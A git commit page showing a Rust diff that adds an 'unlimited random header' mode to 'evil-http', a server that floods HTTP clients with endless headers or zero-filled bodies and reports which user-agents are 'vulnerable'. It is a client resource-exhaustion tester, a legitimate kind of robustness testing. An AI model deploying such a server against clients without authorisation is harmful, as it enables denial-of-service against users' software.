Add unlimited-random-header mode
This commit is contained in:
parent
bae33aaee6
commit
e8ad82ab1c
62
src/main.rs
62
src/main.rs
|
|
@ -1,21 +1,22 @@
|
||||||
use std::io::{Read, Write};
|
use std::io::{Read, Write};
|
||||||
use std::net::{TcpListener, TcpStream};
|
use std::net::{TcpListener, TcpStream};
|
||||||
|
|
||||||
use std::time::Duration;
|
use std::time::{Duration, SystemTime, UNIX_EPOCH};
|
||||||
|
|
||||||
use std::env;
|
use std::env;
|
||||||
use std::str::FromStr;
|
use std::str::FromStr;
|
||||||
use std::thread;
|
use std::thread;
|
||||||
|
|
||||||
const HTTP_HEAD_SUCCESS_HEADERS: &[u8] = b"HTTP/1.1 200 OK\r
|
const HTTP_200: &[u8] = b"HTTP/1.1 200 OK\r
|
||||||
Server: nginx\r
|
Server: nginx\r";
|
||||||
|
|
||||||
|
const HTTP_HEAD_SUCCESS_HEADERS: &[u8] = b"
|
||||||
Content-Type: image/jpeg\r
|
Content-Type: image/jpeg\r
|
||||||
Content-Length: 11509\r\n\r\n";
|
Content-Length: 11509\r\n\r\n";
|
||||||
|
|
||||||
const HTTP_GET_SUCCESS_HEADERS: &[u8] = b"HTTP/1.1 200 OK\r
|
const HTTP_GET_SUCCESS_HEADERS: &[u8] = b"
|
||||||
Server: nginx\r
|
Content-Type: image/jpeg\r
|
||||||
Transfer-Encoding: chunked\r
|
Transfer-Encoding: chunked\r\n\r\n";
|
||||||
Content-Type: image/jpeg\r\n\r\n";
|
|
||||||
|
|
||||||
const BODY_CHUNK: &[u8] = &[0u8; 1024 * 1024];
|
const BODY_CHUNK: &[u8] = &[0u8; 1024 * 1024];
|
||||||
|
|
||||||
|
|
@ -24,32 +25,52 @@ const END: &[u8] = &[];
|
||||||
struct EvilServer {
|
struct EvilServer {
|
||||||
mbs_to_send: usize,
|
mbs_to_send: usize,
|
||||||
socket_timeout: Option<Duration>,
|
socket_timeout: Option<Duration>,
|
||||||
|
mode: u8,
|
||||||
}
|
}
|
||||||
|
|
||||||
impl EvilServer {
|
impl EvilServer {
|
||||||
fn new(mbs_to_send: usize, secs: u64) -> EvilServer {
|
fn new(mbs_to_send: usize, secs: u64, mode: u8) -> EvilServer {
|
||||||
EvilServer {
|
EvilServer {
|
||||||
mbs_to_send,
|
mbs_to_send,
|
||||||
socket_timeout: match secs {
|
socket_timeout: match secs {
|
||||||
0 => None,
|
0 => None,
|
||||||
x => Some(Duration::from_secs(x)),
|
x => Some(Duration::from_secs(x)),
|
||||||
},
|
},
|
||||||
|
mode,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
fn write_get(&self, stream: &mut TcpStream, count: &mut usize) -> std::io::Result<()> {
|
fn write_get(&self, stream: &mut TcpStream, count: &mut usize) -> std::io::Result<()> {
|
||||||
stream.write_all(HTTP_GET_SUCCESS_HEADERS)?;
|
stream.write_all(HTTP_200)?;
|
||||||
send_chunk(stream, IMAGE)?;
|
|
||||||
let mbs_to_send = if self.mbs_to_send > 0 {
|
let mbs_to_send = if self.mbs_to_send > 0 {
|
||||||
self.mbs_to_send
|
self.mbs_to_send
|
||||||
} else {
|
} else {
|
||||||
usize::MAX
|
usize::MAX
|
||||||
};
|
};
|
||||||
for _ in 0..mbs_to_send {
|
match self.mode {
|
||||||
send_chunk(stream, BODY_CHUNK)?;
|
1 => {
|
||||||
*count += 1;
|
for _ in 0..mbs_to_send {
|
||||||
|
let now = SystemTime::now();
|
||||||
|
let now = now
|
||||||
|
.duration_since(UNIX_EPOCH)
|
||||||
|
.expect("Time went backwards")
|
||||||
|
.as_nanos();
|
||||||
|
stream.write_all(format!("\n{}: woo\r", now).as_bytes())?;
|
||||||
|
*count += 1;
|
||||||
|
}
|
||||||
|
stream.write_all(HTTP_HEAD_SUCCESS_HEADERS)?;
|
||||||
|
stream.write_all(IMAGE)?;
|
||||||
|
}
|
||||||
|
_ => {
|
||||||
|
stream.write_all(HTTP_GET_SUCCESS_HEADERS)?;
|
||||||
|
send_chunk(stream, IMAGE)?;
|
||||||
|
for _ in 0..mbs_to_send {
|
||||||
|
send_chunk(stream, BODY_CHUNK)?;
|
||||||
|
*count += 1;
|
||||||
|
}
|
||||||
|
send_chunk(stream, END)?;
|
||||||
|
}
|
||||||
}
|
}
|
||||||
send_chunk(stream, END)?;
|
|
||||||
stream.flush()?;
|
stream.flush()?;
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
@ -68,6 +89,7 @@ impl EvilServer {
|
||||||
stream.set_nodelay(true)?;
|
stream.set_nodelay(true)?;
|
||||||
|
|
||||||
if head_request {
|
if head_request {
|
||||||
|
stream.write_all(HTTP_200)?;
|
||||||
stream.write_all(HTTP_HEAD_SUCCESS_HEADERS)?;
|
stream.write_all(HTTP_HEAD_SUCCESS_HEADERS)?;
|
||||||
stream.flush()?;
|
stream.flush()?;
|
||||||
} else {
|
} else {
|
||||||
|
|
@ -78,9 +100,13 @@ impl EvilServer {
|
||||||
println!("user-agent is vulnerable: {}", user_agent);
|
println!("user-agent is vulnerable: {}", user_agent);
|
||||||
}
|
}
|
||||||
Err(e) => {
|
Err(e) => {
|
||||||
|
let units = match self.mode {
|
||||||
|
1 => " headers",
|
||||||
|
_ => "mb",
|
||||||
|
};
|
||||||
println!(
|
println!(
|
||||||
"user-agent is NOT vulnerable: {}, aborted after {}mb, err: {}",
|
"user-agent is NOT vulnerable: {}, aborted after {}{}, err: {}",
|
||||||
user_agent, count, e
|
user_agent, count, units, e
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
@ -145,14 +171,14 @@ fn main() {
|
||||||
let args = Args::new(args);
|
let args = Args::new(args);
|
||||||
if args.get_str(1, "").contains("-h") {
|
if args.get_str(1, "").contains("-h") {
|
||||||
println!(
|
println!(
|
||||||
"usage: {} [-h] [mbs-to-serve, 100] [host, 127.0.0.1:5555] [socket_timeout, 10]",
|
"usage: {} [-h] [mbs-to-serve, 100] [host, 127.0.0.1:5555] [mode, 0] [socket_timeout, 10]",
|
||||||
args.get_str(0, "evil-http")
|
args.get_str(0, "evil-http")
|
||||||
);
|
);
|
||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
let host = args.get_str(2, "0.0.0.0:5555");
|
let host = args.get_str(2, "0.0.0.0:5555");
|
||||||
|
|
||||||
let evil_server = EvilServer::new(args.get(1, 100), args.get(3, 10));
|
let evil_server = EvilServer::new(args.get(1, 100), args.get(4, 10), args.get(3, 0));
|
||||||
let evil_server = Box::leak(Box::new(evil_server));
|
let evil_server = Box::leak(Box::new(evil_server));
|
||||||
|
|
||||||
let listener = TcpListener::bind(&host).unwrap();
|
let listener = TcpListener::bind(&host).unwrap();
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue